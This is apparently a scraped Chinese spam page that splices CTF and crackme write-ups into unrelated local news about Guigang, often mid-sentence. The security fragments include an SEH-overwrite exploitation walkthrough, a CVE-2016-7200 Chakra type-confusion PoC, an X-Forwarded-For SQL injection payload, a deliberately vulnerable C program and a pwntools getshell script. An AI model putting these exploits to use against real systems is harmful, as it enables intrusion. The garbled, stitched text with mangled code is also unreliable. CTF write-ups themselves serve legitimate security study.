更多>>精华博文推荐
更多>>人气最旺专家

王缙

领域:维基百科

介绍:GDIObjView:这是个独立的应用程序,它加载通过GDIObjDump转储的二进制数据并显示一个表示GDI表的图例。zip解压缩apk文件,拿到.dex文件,经过dex2jar,jd-gui反编译拿到java代码,发现被名称混淆了,而且字符串也加密了。,系统中每个进程的MMWSL都在内核虚拟地址空间的超空间(HyperSpace)上一个完全相同的地址。:0040100Dmovdword_41B034,:00401017callget_:::00401026moveax,dword_:0040102Btesteax,:0040102Djnzshortloc_:0040102FpushoffsetaYouGetIt;"Yougetit!".text:00401034callsub_:00401039addesp,:0040103Cxoreax,:0040103Eretncheck1v0!=0,v1!=0,v0!=v15*(v1-v0)+v1=0x8F503A4213*(v1-v0)+v0=0xEF503A42化简第一个等式得6*v1-5*v0=0x8F503A42,记为(1)check2v0!=0,v1!=0,v0!=v117*(v1-v0)+v1=0xF3A948837*(v1-v0)+v0=0x33A94883化简第一个等式得18*v1-17*v0=0xF3A94883,记为(2)化简(1),(2)得-2*v0=0x45B899BD,显然不成立2get_sn存在溢出,溢出修改返回地址为0x00413131,sn格式为:11112222333311Av0=0x31313131v1=0x32323232v2=0x33333333第一个验证:4*(v0-v1)+v0+v2=:004133E9subeax,0EAF917E2h第二个验证:3*(v0-v1)+v0+v2=:004135F7subeax,0E8F508C8h第三个验证:3*(v0-v1)+v0-v2=:004136D8subeax,0C0A3C68h化简得v0-v1=02040F1Av0+v2=E2E8DB7Av0-v2=05FE0F1Av0=7473754Av1=726F6630v2=6E756630Just0for0fun11A...

阮籍

领域:网易健康

介绍:这里的newArr的创建操作如下//IfthesourceobjectisanArrayexoticobjectweshouldtr*newObj=ArraySpeciesCreate(obj,0,scriptContext);JavascriptArray*newArr=nullptr;//Ifthenewobjectwecreatedisanarray,rememberthatasitwillsaveustimesettingpropertiesintheobjectbelowif(JavascriptArray::Is(newObj)){newArr=JavascriptArray::FromVar(newObj);}注意虽然进行了转换,但是最后newArr却是NativeIntArray类型=0x000001E353F7C5100x000001E353F7C5100000000000000003........0x000001E353F7C5180000000600000000........0x000001E353F7C5200000000000000000........0x000001E353F7C5280000000100000002........0x000001E353F7C5300000000380000002.......\n0x000001E353F7C5388000000280000002......\n观察接下来的取值和赋值操作可以发现问题for(uint32k=0;klength;k++){if(!pArr-DirectGetItemAtFull(k,element)){continue;}selected=callBackFn-GetEntryPoint()(callBackFn,CallInfo(CallFlags_Value,4),thisArg,element,JavascriptNumber::ToVar(k,scriptContext),pArr);if(JavascriptConversion::ToBoolean(selected,scriptContext)){//Trytofastpathifthereturnobjectisanarrayif(newArr){newArr-DirectSetItemAt(i,element);}...pArr的类型为JavascriptArraynewArr的类型为JavascriptNativeIntArray这里直接从pArr中取出值放入了newArr,很明显是一个类型混淆造成这个混淆的根本原因是设置了staticget[](){returndummy;}导致返回了一个JavascriptNativeIntArray,从而与JavascriptArray造成混淆。不过想到这是从稍微可信的地方下载的,试试应该不会有大碍)。要建立江河管理保护信息发布平台,接受社会和群众监督。,2018安全开发者峰会是由拥有18年悠久历史的老牌安全技术社区——看雪学院举办,会议面向开发者、安全人员及高端技术从业人员,是国内开发者与安全人才的年度盛事。...

www.v0266.com
z7x | 2018-8-22 | 阅读(195) | 评论(641)
但是这里还有一个细节就是当你向上跳转的时候是jmp一个负的地址那么这条jmpXXXX这条指令就会撑爆当前的这四个字节空间,覆盖掉了后面的sehandler数据,所以我们要先在下面找到一个比较近的一块空区域然后在那块区域的地址上写上我们jmpshellcode的指令.我们选择0018FF8O这个地址现在我们加长我们的文本,可以看到下图中,现在搜索我们的poppopret指令,反汇编窗口ctrl+G输入00401804在然后再pop上下断点,shitf+f9运行观察eip,当执行完ret指令后的当前指令修改为jmp0018FF80上图是覆盖PointertoNextRecord为jmp0018FF80为向下跳转,单步一步,然后这里需要一个向上跳转的jmp这里就用我们文本的第一个字节作为shellcode起始位置0018FF80jmp0018FF80的二进制是E9B3FBFF此时0018FF80地址处的指令就是jmp0018FF80单步就到了我们的buf头了可以看到我们覆盖的数据了,二进制是这样的接下来我们就在buf中扣一段shellcode在0018FF80这里写指令跳到它的首地址直接用第一个字节的地址0018FB38总结下过程:1.找到SEH处理函数,寻找跳板poppopret来覆盖掉ntdll中的seHandler2.构造跳板跳向shellcode,字节长度问题可以在seHandler下方找跳板间接找跳板跳向shellcode在扫描根和第一轮复制之后,扫描新分配的to-space中的对象以供参考。,运行时几乎所有的JS开发者在浏览器中都使用过API(例如“setTimeout”)。运行,OD附加前往401000,看着挺像处理代码的下断运行,输入sn后断下(运气挺好)这个应该是初始化luabytecode(看后面字符串,功能应该是xor)0040103D885C2436movbyteptrss:[esp+36],bl0040104188442437movbyteptrss:[esp+37],al00401045C644243807movbyteptrss:[esp+38],70040104A885C2439movbyteptrss:[esp+39],bl...初始化的栈信息0012FA4E0010927C0000000000001B4C4A02023B.抾......LJ;0012FA5E00020700030009360200003902010236....6..960012FA6E03000039030203120400001205010012..9...0012FA7E06010042030400430200000873756209.B.C.. string.0012FA9E00050175360100003901010112020000.u6..9..0012FAAE42010202080100005801028029010000B..X)..0012FABE4C010200360102003901030136020400L.6.96.0012FACE12030000290401004202030229037000..).B)6.96.0012FAEE12040000290502004203030229046500..).B)6.96.0012FB0E12050000290603004204030229056400..).B)6.96.0012FB2E12060000290704004205030229066900..).B)6.96.0012FB4E12070000290805004206030229077900..).B)6.96.0012FB6E12080000290906004207030229083100..)..B)6.96.0012FB8E12090000290A07004208030229093200...)..B).6.96..0012FBAE120A0000290B080042090302290A3300...) .B.).6..9..6..0012FBCE120B0000290C0900420A0302290B3400 ..)...B.) 6..9..6 .0012FBEE120C0000290D0A00420B0302290C3500...)...B ).6 .9  6..0012FC0E120D0000290E0B00420C0302290D3600...) .B.). 6..9..6..0012FC2E120E0000290F0C00420D0302290E3700..)..B.)....0012FC4E12100400121105001212060012130700....0012FC5E121408001215090012160A0012170B00..... .0012FC6E12180C004A0D0D000762790962786F72..J...bitlen string0012FC8E3D030002000600083600000027010100=...6....0012FC9E42000201330002003700030033000400B.3..7..3..0012FCAE370005004B000100096D61696E0007627..K...main.b0012FCBE7900086269740C726571756972650002y.0012FCCE0000FE55F9EAEBD15D00313233343536..㑳胙].1234560012FCDE00000000000000000000000000000000................0012FCEE00000000000000000000000000000000................0012FCFE00000000000000000000000000000000................lua初始化,43Cleaeax,dwordptrss:[esp+3C],380040220E85C0testeax,每个字符(恩,虽然是猜的,但是后面证明猜对了)lua_xor(sn[i])xor05120A2942417561358355940040222C55pushebp00,eax004022376AF5push-0B0040223956pushesi0040223A83F705xoredi,,eax004022446AF6push-0A0040224656pushesi0040224783F312xorebx,,eax004022516AF7push-90040225356pushesi0040225483F50Axorebp,,290040225F6AF8push-80040226156pushesi0040226289442458movdwordptrss:[esp+58],,420040226E6AF9push-70040227056pushesi0040227189442448movdwordptrss:[esp+48],,410040227D6AFApush-60040227F56pushesi0040228089442460movdwordptrss:[esp+60],,750040228C6AFBpush-50040228E56pushesi0040228F89442460movdwordptrss:[esp+60],,400040229B83F061xoreax,610040229E6AFCpush-4004022A056pushesi004022A189442418movdwordptrss:[esp+18],,35004022AD6AFDpush-3004022AF56pushesi004022B089442424movdwordptrss:[esp+24],,83004022BE6AFEpush-2004022C056pushesi004022C189442434movdwordptrss:[esp+34],,55004022CD6AFFpush-1004022CF56pushesi004022D089442444movdwordptrss:[esp+44],,94结果必须为:18161E2F4811213733865294004022F383FF18cmpedi,18004022F67554jnzshort0040234C004022F883FB16cmpebx,16004022FB754Fjnzshort0040234C004022FD83FD1Ecmpebp,1E00402300754Ajnzshort0040234C00402302837C24302Fcmpdwordptr[esp+30],2F004023077543jnzshort0040234C00402309837C241848cmpdwordptr[esp+18],480040230E753Cjnzshort0040234C00402310837C242811cmpdwordptr[esp+28],11004023157535jnzshort0040234C00402317837C242021cmpdwordptr[esp+20],210040231C752Ejnzshort0040234C0040231E837C241037cmpdwordptr[esp+10],37004023237527jnzshort0040234C00402325837C241433cmpdwordptr[esp+14],330040232A7520jnzshort0040234C0040232C817C241C86000cmpdwordptr[esp+1C],86004023347516jnzshort0040234C00402336837C242452cmpdwordptr[esp+24],520040233B750Fjnzshort0040234C0040233D817C242C94000cmpdwordptr[esp+2C],94004023457505jnzshort0040234C004023478D47E9leaeax,dwordptr[edi-17]0040234AEB02jmpshort0040234E0040234C33C0xoreax,eax没看lua代码,直接试了下voidtest(){BYTEkey1[12];//123456789012BYTEbuf1[12]={0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x30,0x31,0x32};//call00412CE0的结果BYTEbuf2[12]={0x41,0x57,0x57,0x5D,0x4C,0x07,0x05,0x0B,0x0D,0x05,0x07,0x05};BYTEkey2[12]={0x05,0x12,0x0A,0x29,0x42,0x41,0x75,0x61,0x35,0x83,0x55,0x94};BYTEexpected[12]={0x18,0x16,0x1E,0x2F,0x48,0x11,0x21,0x37,0x33,0x86,0x52,0x94};for(inti=0;i12;i++){key1[i]=buf1[i]^buf2[i];}BYTEsn[13]={0};for(inti=0;i12;i++){sn[i]=key1[i]^key2[i]^expected[i];}printf(%s,sn);}maposafe2017...【阅读全文】
rlr | 2018-8-22 | 阅读(213) | 评论(921)
记者看到,在房车这个移动的家里面,沙发、电视、浴室、餐桌、卧室等生活设施一应俱全,车上还装有完善的排污系统和生活垃圾收集装置。通过上述分析,我们只需将“JPyjup3eCyJjlkV6DmSmGHQ=”base64解码再rc4解密,即是sn使用在线rc4解密并有base64编码功能的,进行解密:sn=madebyericky94528,  在船上召开的座谈会上,李新元首先与大家共同学习党的十九大精神。漏洞代码如下:######{intreply_count;structMessage*nextMsg;intmsgid;char*author;intauthor_size;char*title;inttitle_size;char*content;intcontent_size;inttotal_num;};structMessage*head,*tail;charinput_buffer[0x1000];voidread_input(char*buf,intread_len,intbuf_size){if(NULL==buf||read_len=0)return;memset(buf,0,buf_size);inti=0;chartemp_char;while(1){temp_char=getchar();if(iread_len)buf[i]=temp_char;if(temp_char==0xA)break;i++;}}uint32_tread_input_uint(char*buf,intread_len,intbuf_size){read_input(buf,read_len,buf_size);returnstrtoul(buf,0,10);}voidinsertMessage(intmessageId){structMessage*tmp=head;while(tmp-nextMsg!=tail){tmp=tmp-nextMsg;}structMessage*new_msg;new_msg=(structMessage*)malloc(sizeof(structMessage));new_msg-msgid=messageId;write(STDOUT_FILENO,"inputyounamelen:",20);new_msg-author_size=read_input_uint(input_buffer,sizeof(input_buffer),sizeof(input_buffer));new_msg-author=(char*)malloc(new_msg-author_size);write(STDOUT_FILENO,"inputyouname:",16);read_input(new_msg-author,new_msg-author_size,new_msg-author_size);write(STDOUT_FILENO,"inputyoutitlelen:",21);new_msg-title_size=read_input_uint(input_buffer,sizeof(input_buffer),sizeof(input_buffer));new_msg-title=(char*)malloc(new_msg-title_size);write(STDOUT_FILENO,"inputyoutitle:",17);read_input(new_msg-title,new_msg-title_size,new_msg-title_size);write(STDOUT_FILENO,"inputyoucontentlen:",23);new_msg-content_size=read_input_uint(input_buffer,sizeof(input_buffer),sizeof(input_buffer));new_msg-content=(char*)malloc(new_msg-content_size);write(STDOUT_FILENO,"inputyoucontent:",19);read_input(new_msg-content,new_msg-content_size,new_msg-content_size);new_msg-nextMsg=tmp-nextMsg;tmp-nextMsg=new_msg;}structMessage*print_msg(intmsgid){structMessage*tmp=head;while(tmp!=tail){if(tmp-msgid==msgid){write(STDOUT_FILENO,"msgauthor:",11);write(STDOUT_FILENO,tmp-author,tmp-author_size);write(STDOUT_FILENO,",msgtitle:",11);write(STDOUT_FILENO,tmp-title,tmp-title_size);write(STDOUT_FILENO,",msgcontent:",13);write(STDOUT_FILENO,tmp-content,tmp-content_size);//write(STDOUT_FILENO,",msgreplycount:",17);//write(STDOUT_FILENO,tmp-reply_count,4);write(STDOUT_FILENO,"",1);/*printf("msgauthor:%s,msgtitle%s,msgcontent%s,msgreplycount%d",tmp-author,tmp-title,tmp-content,tmp-reply_count);*/returntmp;}tmp=tmp-nextMsg;}returnNULL;}voiddelete_msg(structMessage*delmsg){//deletelinkedlistmsgandfreestructMessage*tmp=head;while(tmp-nextMsg!=delmsg){tmp=tmp-nextMsg;}tmp-nextMsg=delmsg-nextMsg;//freefree(delmsg-author);free(delmsg-content);free(delmsg-title);free(delmsg);}voidmodify_msg(structMessage*modifymsg){intsize=0;chartemp[0x100];write(STDOUT_FILENO,"inputnewnamelen:",20);size=read_input_uint(input_buffer,sizeof(input_buffer),sizeof(input_buffer));if(size0x100)return;write(STDOUT_FILENO,"inputnewname:",16);read_input(temp,size,0x100);memcpy(modifymsg-author,temp,size);modifymsg-author_size=size;write(STDOUT_FILENO,"inputnewtitlelen:",21);size=read_input_uint(input_buffer,sizeof(input_buffer),sizeof(input_buffer));if(size0x100)return;write(STDOUT_FILENO,"inputnewtitle:",17);read_input(temp,size,0x100);memcpy(modifymsg-title,temp,size);modifymsg-title_size=size;write(STDOUT_FILENO,"inputnewcontentlen:",23);size=read_input_uint(input_buffer,sizeof(input_buffer),sizeof(input_buffer));if(size0x100)return;write(STDOUT_FILENO,"inputnewcontent:",19);read_input(temp,size,0x100);modifymsg-content=(char*)malloc(size);memcpy(modifymsg-content,temp,size);modifymsg-content_size=size;}voidmain(){structMessageHEAD,TAIL;head=HEAD;tail=TAIL;head-nextMsg=tail;head-msgid=0;tail-nextMsg=NULL;tail-msgid=-1;charusage[128]=",,;pleaseinputyouchoice.";charoperate_usage[80]="Pleaseselecttheoperate:";intcmd=0,msg_count=0,operate=0;while(1){write(STDOUT_FILENO,usage,strlen(usage));read_input(input_buffer,sizeof(input_buffer),sizeof(input_buffer));sscanf(input_buffer,"%d",cmd);switch(cmd){case1://添加留言msg_count++;insertMessage(msg_count);break;case2:write(STDOUT_FILENO,"inputmsgidwillread:",23);intread_msg_id=0;read_input(input_buffer,sizeof(input_buffer),sizeof(input_buffer));sscanf(input_buffer,"%d",read_msg_id);structMessage*read_msg=print_msg(read_msg_id);if(read_msg==NULL){//write(STDOUT_FILENO,"msgiderror",12);return;}while(1){write(STDOUT_FILENO,operate_usage,strlen(operate_usage));operate=read_input_uint(input_buffer,sizeof(input_buffer),sizeof(input_buffer));//sscanf(input_buffer,"%d",operate);if(operate==1){delete_msg(read_msg);}elseif(operate==2){modify_msg(read_msg);}elseif(operate==3){read_msg-reply_count++;}elseif(operate==4){break;}}break;case3:write(STDOUT_FILENO,"exit",5);return;}}}...【阅读全文】
lt7 | 2018-8-22 | 阅读(145) | 评论(634)
Payload:要注入的DLL在网上搜索了一些关于DLL注入的资料,发现都没有被注入的DLL的实现,这里首先占用少量篇幅来说明DLL的实现。关闭优化选项,dep,aslr,safeseh(vs项目属性选择配置属性-链接器-命令行填写“/SAFESEH:NO”)我们可以试试如果和上次一样覆盖掉返回地址当执行到Security_Check_Cookie的时候,他会检查栈Cookies和.data的副本,这时候GS就分发系统异常处理请求然后就由系统接管处理你这个异常我们可以先用mona插件查看程序当前seh链表这个地址指向的就是PointertonextSEHrecord下面的SEhander是ntdll中的系统接管处理。,2018安全开发者峰会是由拥有18年悠久历史的老牌安全技术社区——看雪学院举办,会议面向开发者、安全人员及高端技术从业人员,是国内开发者与安全人才的年度盛事。此外,2015年以来,国电集团白花山风电、海大集团贵港饲料生产、步步高集团贵港购物广场、万达集团贵港广场、恒大集团贵港恒大城、碧桂园集团贵港房地产等国际知名企业或全国五百强企业项目纷纷落户港北并开工、投产,投资洼地优势和成效进一步突显。...【阅读全文】
3jl | 2018-8-22 | 阅读(349) | 评论(825)
漏洞证明在留言处,设置XFF为X-Forwarded-For:1,content),(,0,2,1513505345,version(),content21)#,如下所示:访问guest_成功地显示出数据库的版本号。这道题还是比较简单,只是加了点反调试(关闭和禁用前台窗口,设置线程来禁止调试事件).分析见注释:00F520A0/$55pushebp00F520A1|.8BECmovebp,esp00F520A3|.6AFEpush-200F520A5|.684044F700push00F7444000F520AA|.68F0D6F500push00F5D6F0入口点00F520AF|.64:A100000000moveax,fs:[0]00F520B5|.50pusheax00F520B6|.83EC14subesp,1400F520B9|.A1DC65F700moveax,[0F765DC]00F520BE|.3145F8xor[ebp-8],eax00F520C1|.33C5xoreax,ebp00F520C3|.8945E4mov[ebp-1C],eax00F520C6|.53pushebx00F520C7|.56pushesi00F520C8|.57pushedi00F520C9|.50pusheax00F520CA|.8D45F0leaeax,[ebp-10]00F520CD|.64:A300000000movfs:[0],eax00F520D3|.E888FEFFFFcall00F51F60//调用反调试程序,关闭和禁用前台窗口(如被调试,前台窗口是调试器窗口)00F520D8|.3BF4cmpesi,esp00F520DA|.E8B1FCFFFFcall00F51D90[,//输出"password:",并读取输入SN00F520DF|.8BF0movesi,eax00F520E1|.3BF5cmpesi,ebp00F520E3|.C745DC54727573movdwordptr[ebp-24],7375725400F520EA|.C745E0744D6500movdwordptr[ebp-20],654D7400F520F1|.8D45DCleaeax,[ebp-24]00F520F4|.50pusheax/Arg200F520F5|.56pushesi|Arg100F520F6|.E8353E0000call00F55F30\,//strstr(SN,"TrustMe")00F520FB|.83C408addesp,800F520FE|.85C0testeax,eax00F52100|.-7507jnzshort00F5210900F52102|.8BCEmovecx,esi//SN中必须有"TrustMe",否则提示"error!"00F52104|.E887FDFFFFcall00F51E9000F52109|682438F700push00F73824/Procname="ZwSetInformationThread"00F5210E|.683C38F700push00F7383C|/FileName=""00F52113|.8B3D20D0F600movedi,[0F6D020]||00F52119|.FFD7calledi|\|.50pusheax|hModule00F5211C|.8B1D24D0F600movebx,[0F6D024]|00F52122|.FFD3callebx\|.8BF0movesi,eax00F52126|.6A00push000F52128|.6A00push000F5212A|.6A11push11//ThreadHideFromDebugger,禁止调试事件00F5212C|.FF151CD0F600call[0F6D01C][|.50pusheax00F52133|.FFD6callesi//CallZwSetInformationThread,禁止调试事件00F52135|.C745FC00000000movdwordptr[ebp-4],000F5213C|.A138D1F600moveax,[0F6D138]00F52141|.A34C8CF700mov[0F78C4C],eax00F52146|.C745FCFEFFFFFFmovdwordptr[ebp-4],-200F5214D|.E821000000call00F52173[|.A14C8CF700moveax,[0F78C4C]00F52157|.3B0540D1F600cmpeax,[0F6D140]00F5215D|.-7535jneshort00F5219400F5215F|.6A00push0;/ExitCode=000F52161|.FF1514D0F600call[0F6D014]\|.8B1D24D0F600movebx,[0F6D024]00F5216D|.8B3D20D0F600movedi,[0F6D020]00F52173|$682438F700push00F73824ASCII"ZwSetInformationThread"00F52178|.683C38F700push00F7383CUNICODE""00F5217D|.FFD7calledi00F5217F|.50pusheax00F52180|.FFD3callebx00F52182|.8BF0movesi,eax00F52184|.6A00push000F52186|.6A00push000F52188|.6A11push11//ThreadHideFromDebugger,禁止调试事件00F5218A|.FF151CD0F600call[0F6D01C][|.50pusheax00F52191|.FFD6callesi//CallZwSetInformationThread,禁止调试事件00F52193|.C3retn00F52194|E847FEFFFFcall00F51FE0//判断后8位是否为"20161018",是,则返回1表示成功00F52199|.85C0testeax,eax00F5219B|.-7432jzshort00F521CF00F5219D|.6A09push9;//注册码为"TrustMe20161018",则提示成功00F5219F|.E8FB300000call00F5529F00F521A4|.C70073756363movdwordptr[eax],6363757300F521AA|.C7400465737321movdwordptr[eax+4],2173736500F521B1|.C6400800movbyteptr[eax+8],000F521B5|.8BD0movedx,eax00F521B7|.E8D4120000call00F53490[|.50pusheax00F521BD|.E8BE170000call00F5398000F521C2|.685038F700push00F73850ASCII"pause"00F521C7|.E8E43F0000call00F561B000F521CC|.83C40Caddesp,0C00F521CF|33C0xoreax,eax00F521D1|.8B4DF0movecx,[ebp-10]00F521D4|.64:890D00000000movfs:[0],ecx00F521DB|.59popecx00F521DC|.5Fpopedi00F521DD|.5Epopesi00F521DE|.5Bpopebx00F521DF|.8B4DE4movecx,[ebp-1C]00F521E2|.33CDxorecx,ebp00F521E4|.E8B6340000call00F5569F00F521E9|.8BE5movesp,ebp00F521EB|.5Dpopebp00F521EC\.C3retn关闭,禁用窗口的反调试:00F51F60$,[ebp-4],[0F6D01C][[0F6D018][,eax00F51F7C.-修改段寄存器00F51F7FE8dbE800F51F80/.5Fpopedi00F51F81|.5Epopesi00F51F82|.5Bpopebx00F51F83|.8BE5movesp,ebp00F51F85|.5Dpopebp00F51F86\.,[0F775E0]入口点00F51F8F.-EB02jmpshort00F51F9300F51F91E8dbE800F51F9279db79chary,[0F78C60]//[ebp-4],,,[0F775E0]入口点,0FABEE9000F51FAF.-7502jneshort00F51FB300F51FB1E8dbE800F51FB279db79chary00F51FB3/FF75FCpushdwordptr[ebp-4]00F51FB6|.0315648CF700addedx,[0F78C64]00F51FBC|.FFD2calledx//SendMessageWWM_DESTROY关闭前台窗口,如果开着调试器,调试器就退出了00F51FBE|.61popad00F51FBF|.6A00push0;/Enable=FALSE00F51FC1|.FF75FCpushdwordptr[ebp-4]|hWnd,//禁用前台窗口00F51FC4|.FF1548D1F600call[0F6D148]\|.5Fpopedi00F51FCB|.5Epopesi00F51FCC|.5Bpopebx00F51FCD|.8BE5movesp,ebp00F51FCF|.5Dpopebp00F51FD0\.C3retn后8位判断:00F51FE0/$55pushebp00F51FE1|.8BECmovebp,esp00F51FE3|.83E4F8andesp,FFFFFFF8;qword(8-字节)堆栈对齐方式00F51FE6|.83EC1Csubesp,1C00F51FE9|.A1DC65F700moveax,[0F765DC]00F51FEE|.33C4xoreax,esp00F51FF0|.89442418mov[esp+18],eax00F51FF4|.8B15588CF700movedx,[0F78C58]ASCII"12345678"00F51FFA|.56pushesi00F51FFB|.C74424180F00000movdwordptr[esp+18],0F00F52003|.C74424140000000movdwordptr[esp+14],000F5200B|.803A00cmpbyteptr[edx],000F5200E|.C644240400movbyteptr[esp+4],000F52013|.-7504jneshort00F5201900F52015|.33C9xorecx,ecx00F52017|.-EB10jmpshort00F5202900F52019|8BCAmovecx,edx00F5201B|.8D7101leaesi,[ecx+1]00F5201E|.8BFFmovedi,edi00F52020|8A01/moval,[ecx]00F52022|.41|incecx00F52023|.84C0|testal,al00F52025|.-75F9\jnzshort00F5202000F52027|.2BCEsubecx,esi00F52029|51pushecx00F5202A|.52pushedx00F5202B|.8D4C240Cleaecx,[esp+0C]00F5202F|.E8BC070000call00F527F000F52034|.837C24140Fcmpdwordptr[esp+14],0F;//判断SN长度,一定要15位00F52039|.-7524jneshort00F5205F00F5203B|.A1588CF700moveax,[0F78C58]ASCII"12345678"00F52040|.83C007addeax,700F52043|.50pusheax/Arg1,//后8位转数字00F52044|.A3588CF700mov[0F78C58],eax|00F52049|.E845410000call00F56193\,//atoi00F5204E|.83C404addesp,400F52051|.3DFAA13301cmpeax,133A1FA//比较SN后8位是否为十进制2016101800F52056|.-7507jneshort00F5205F00F52058|.BE01000000movesi,1//后8位为"20161018",返回100F5205D|.-EB02jmpshort00F5206100F5205F|33F6xoresi,esi00F52061|837C241810cmpdwordptr[esp+18],1000F52066|.-720Cjbshort00F5207400F52068|.FF742404pushdwordptr[esp+4]/Arg100F5206C|.E85F440000call00F564D0\|.83C404addesp,400F52074|8B4C241Cmovecx,[esp+1C]00F52078|.8BC6moveax,esi00F5207A|.5Epopesi00F5207B|.33CCxorecx,esp00F5207D|.E81D360000call00F5569F00F52082|.8BE5movesp,ebp00F52084|.5Dpopebp00F52085\.C3retn,因此我制作了一些对我以及他人可能有用的工具。原标题:贯彻落实绿色发展理念切实保护绿水青山发挥西江黄金水道优势带动各项事业发展  11月8日,市委书记、我市江河湖库总河长李新元到郁江巡河并调研两岸各项建设。...【阅读全文】
f3n | 2018-8-22 | 阅读(842) | 评论(562)
在第二个变体中,我们注意到在不同的设备中,查杀过程行为是不同的。2018安全开发者峰会是由拥有18年悠久历史的老牌安全技术社区——看雪学院举办,会议面向开发者、安全人员及高端技术从业人员,是国内开发者与安全人才的年度盛事。,  近年来,贵港供电局主动对接城市发展需求,累计投入建设资金亿元,为贵港建设西江流域核心港口和新兴工业城市提供电力保障。这里的newArr的创建操作如下//IfthesourceobjectisanArrayexoticobjectweshouldtr*newObj=ArraySpeciesCreate(obj,0,scriptContext);JavascriptArray*newArr=nullptr;//Ifthenewobjectwecreatedisanarray,rememberthatasitwillsaveustimesettingpropertiesintheobjectbelowif(JavascriptArray::Is(newObj)){newArr=JavascriptArray::FromVar(newObj);}注意虽然进行了转换,但是最后newArr却是NativeIntArray类型=0x000001E353F7C5100x000001E353F7C5100000000000000003........0x000001E353F7C5180000000600000000........0x000001E353F7C5200000000000000000........0x000001E353F7C5280000000100000002........0x000001E353F7C5300000000380000002.......\n0x000001E353F7C5388000000280000002......\n观察接下来的取值和赋值操作可以发现问题for(uint32k=0;klength;k++){if(!pArr-DirectGetItemAtFull(k,element)){continue;}selected=callBackFn-GetEntryPoint()(callBackFn,CallInfo(CallFlags_Value,4),thisArg,element,JavascriptNumber::ToVar(k,scriptContext),pArr);if(JavascriptConversion::ToBoolean(selected,scriptContext)){//Trytofastpathifthereturnobjectisanarrayif(newArr){newArr-DirectSetItemAt(i,element);}...pArr的类型为JavascriptArraynewArr的类型为JavascriptNativeIntArray这里直接从pArr中取出值放入了newArr,很明显是一个类型混淆造成这个混淆的根本原因是设置了staticget[](){returndummy;}导致返回了一个JavascriptNativeIntArray,从而与JavascriptArray造成混淆。...【阅读全文】
hb3 | 2018-2-8 | 阅读(432) | 评论(153)
陈晓东介绍,到2017年年底,贵港已引进4家新能源车企业,并在贵港国家生态工业(制糖)示范园区打造了中国—东盟新能源电动车生产基地。CVE-2016-7200标签(空格分隔):ChakraPOCclassdummy{constructor(){return[1,2,3];}}classMyArrayextendsArray{staticget[](){returndummy;}}vara=newMyArray({},[],"natalie",7,7,7,7,7);functiontest(i){returntrue;}varo=(test);调试boolSparseArraySegmentT::IsMissingItem(constT*value){return*value==SparseArraySegmentT::GetMissingItem();}其中左值为0x0000000200000001,右值为0x8000000280000002value实际指向ArraySegment,其中length=3,size=6,元素为1、2、30x00000170823BC5100000000000000003........0x00000170823BC5180000000600000000........0x00000170823BC5200000000000000000........0x00000170823BC5280000000100000002........0x00000170823BC5300000000380000002.......\n0x00000170823BC5388000000280000002......\n对应于poc中定义的(test);会调用()filter()方法创建一个新数组,其包含通过所提供函数实现的测试的所有元素。,通过分析,下面使用python进行穷举,代码如下:importhashlibimportsysdefhash_md5(src):myMd5=()(src)myMd5_Digest=()returnmyMd5_Digestdefis_ok(v):ifv[2:12]==888aeda4ab:return1return0defdo_md5(src):x=x+=chr(ord(src[0])+1)foriinrange(1,len(src)):x+=chr(ord(src[i])+i)x=hash_md5(hash_md5(x))returnxdefget_sn(str,num):if(num==1):forxinstr:yieldxelse:forxinstr:foryinget_sn(str,num-1):yieldx+yif__name__==__main__:printis_ok(a3888aeda4abba91f31c8e0caae48cb9)#000000x=do_md5(000000)printx[2:12]==fd9e2ddbd6forsninget_sn(0123456789abcdefghijklmnopqrstuvwxyz,6):x=do_md5(sn)ifsn[2:6]==0000:printsnifis_ok(x)==1:printsn=+snbreak另外还可以识别点击下载按钮时应用产生的下载链接生成函数,从而自己手动生成下载链接。...【阅读全文】
xfr | 2018-2-8 | 阅读(456) | 评论(43)
”  张景联代表说,将按照报告提出的“聚焦动能转换,进一步提高质量效益”目标,加快发展汽车制造、板材加工、精细化工、船舶修造等产业,促进产业集聚发展。点击此更新会下载一个释放木马的文件,其被执行后会执行加密和横向移动过程。,会议大获成功,受到了梆梆安全、腾讯安全、爱加密、几维安全、百度安全、硬土壳、金山毒霸(猎豹旗下品牌)、乐变技术、腾讯TSRC、Wifi万能钥匙、天特信息、360公司、江民科技、博文视点、华章图书、infoQ、雷锋网等数十家公司和媒体的大力支持和赞助,会场爆满。  房车露营在欧美国家盛行已久,近年来才在中国兴起。...【阅读全文】
ltz | 2018-2-8 | 阅读(408) | 评论(358)
  据了解,贵港市供销社为农服务落到乡镇,走进农村,走到田间地头。我们发现,大部分的根通常是从老generation到年轻generation的参照。,OD载入,输入123456,点确定半天没反应,忽然来个内存异常。V8现在配备了并行Scavenger,通过大量基准测试我们发现它能够减少主线程垃圾收集总时间的20%-50%。...【阅读全文】
bvx | 2018-2-8 | 阅读(798) | 评论(879)
2016年1月,“荷美覃塘”核心区获批成为自治区级现代特色农业(核心)示范区,同年12月,“荷美覃塘”莲藕产业(核心)示范区获得自治区四星级乡村旅游区称号。Arch:amd64-64-littleRELRO:PartialRELROStack:CanaryfoundNX:NXenabledPIE:PIEenabled1:newbox1~box52:deletefree完之后没有修改in_use标志,可以多次free,存在UAF,只有box2和box3可以free3:edit4:print5:guessseed=seed;srand((unignedint)seed);v=rand();if(input()==v)printseed;elseprintv;解题思路我这个解法好像有点麻烦,等结束后学习下标准解法是什么样的..leakprocessbase,leaklibcbase,overwritegot,getshelltest_####*seed=0;intmain(){seed=seed;srand(*(unsignedint*)seed);printf("%p",seed);printf("0x%x",rand());return0;}guess_####*seed=0;intmain(intargc,char**argv){intlow3=atoi(argv[1]);intr=atoi(argv[2]);unsignedintseed;unsignedinti;for(i=0;i=0xFFFFF;i++){seed=i12;seed+=low3;srand(seed);if(rand()==r){printf("0x%x",rand());return0;}}printf("end");return0;}###=Truefrompwnimport*importsyscontext(arch=amd64,kernel=amd64,os=linux)#_level=debugelf=ELF(./club)ifargs[LOCAL]:libc_path=/lib/x86_64-linux-gnu/io=process(./club)("processbase:"+hex(()[/root/Desktop/test/pediy_pwn/club]))("processlibc_base:"+hex(()[libc_path]))else:libc_path=./io=remote(,8888)libc=ELF(libc_path)defcmd_new(index,size):()(1)()(str(index))()(str(size))()returndefcmd_delete(index):()(2)()(str(index))returndefcmd_edit(index,buf):()(3)()(str(index))(buf)returndefcmd_print(index):()(4)()(str(index))data=()returndatadefcmd_guess_wrong(v):()(5)()(str(v))(Thenumberis)data=(!)[:-1]returndatadefcmd_guess_right(v